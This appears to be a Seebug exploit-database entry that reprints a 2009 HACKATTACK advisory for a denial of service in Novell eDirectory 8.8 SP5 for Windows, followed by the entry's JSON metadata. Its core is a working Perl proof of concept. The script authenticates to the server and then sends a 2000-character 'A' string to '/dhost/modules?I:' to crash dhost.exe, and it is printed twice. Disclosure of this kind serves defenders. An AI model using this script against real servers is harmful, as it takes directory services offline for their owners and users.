ID SSV:12635 Type seebug Reporter Root Modified 2009-11-13T00:00:00
Description
No description provided by source.
Product:
Novell eDirectory 8.8 sp5 for Windows
********************************************************************************
Vulnerability:
Denial of Service
********************************************************************************
Discussion:
Vulnerability in '/dhost/modules?I:'
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)
Also in last weeks published another bug in 'modules?L:'
It is not patched yet too..
********************************************************************************
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com
********************************************************************************
Original Advisory
www.hackattack.com
********************************************************************************
PoC:
#!usr\bin\perl
#Vulnerability has found by HACKATTACK
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$address=$ARGV[0];
if(!$ARGV[0]){
print "Usage:perl $0 address\n";
exit();
}
$login = "$address/_LOGIN_SERVER_";
$url = "$address/dhost/";
$module = "modules?I:";
$buffer = "A" x 2000;
$vuln = $module.$buffer;
#Edit the username and password.
$user = "username";
$pass = "password";
#Edit the username and password.
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
$mechanize->submit_form(
form_name => "authenticator",
fields => {
usr => $user,
pwd => $pass},
button => 'Login');
$response2 = $mechanize->get("$url$vuln");
About HACKATTACK
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company \
located in Germany and Austria
More Information about HACKATTACK at
http://www.hackattack.com
{"sourceData": "\n Product:\r\nNovell eDirectory 8.8 sp5 for Windows\r\n\r\n\r\n********************************************************************************\r\nVulnerability:\r\nDenial of Service\r\n\r\n\r\n\r\n********************************************************************************\r\nDiscussion:\r\nVulnerability in '/dhost/modules?I:'\r\nSending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)\r\nAlso in last weeks published another bug in 'modules?L:'\r\nIt is not patched yet too..\r\n\r\n\r\n\r\n********************************************************************************\r\nCredits:\r\nHACKATTACK IT SECURITY GmbH\r\nPenetration Testing in Deutschland - \u00d6sterreich - Schweiz\r\nwww.hackattack.com\r\n\r\n\r\n\r\n********************************************************************************\r\n\r\nOriginal Advisory\r\nwww.hackattack.com\r\n\r\n\r\n\r\n********************************************************************************\r\nPoC:\r\n\r\n#!usr\\bin\\perl\r\n#Vulnerability has found by HACKATTACK\r\n\r\nuse WWW::Mechanize; \r\n\r\nuse LWP::Debug qw(+);\r\n\r\nuse HTTP::Cookies;\r\n\r\n$address=$ARGV[0]; \r\n\r\n\r\nif(!$ARGV[0]){\r\n\r\n print "Usage:perl $0 address\\n";\r\n\t\r\nexit();\r\n}\r\n\r\n\r\n\r\n$login = "$address/_LOGIN_SERVER_";\r\n\r\n$url = "$address/dhost/";\r\n\r\n$module = "modules?I:";\r\n\r\n$buffer = "A" x 2000;\r\n\r\n\r\n$vuln = $module.$buffer;\r\n\r\n#Edit the username and password.\r\n\r\n\t $user = "username";\r\n \r\n \t $pass = "password"; \r\n\r\n#Edit the username and password.\r\n \r\nmy $mechanize = WWW::Mechanize->new();\r\n\r\n\r\n$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));\r\n\r\n\r\n$mechanize->timeout($url_timeout); \r\n\r\n$res = $mechanize->request(HTTP::Request->new('GET', "$login")); \r\n\r\n\r\n $mechanize->submit_form( \r\n\r\n form_name => "authenticator", \r\n\r\n fields => { \r\n \r\n usr => $user, \r\n\r\n pwd => $pass}, \r\n\r\n button => 'Login'); \r\n\r\n$response2 = $mechanize->get("$url$vuln");\r\n\r\n\r\nAbout HACKATTACK\r\n================\r\nHACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company \\\r\nlocated in Germany and Austria\r\n\r\n\r\nMore Information about HACKATTACK at\r\nhttp://www.hackattack.com\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12635", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-12635", "type": "seebug", "viewCount": 1, "references": [], "lastseen": "2017-11-19T18:30:33", "published": "2009-11-13T00:00:00", "cvelist": [], "id": "SSV:12635", "enchantments_done": [], "modified": "2009-11-13T00:00:00", "title": "Novell eDirectory 8.8 SP5 Denial of Service", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2017-11-19T18:30:33", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:30:33", "rev": 2}, "vulnersScore": -0.6}}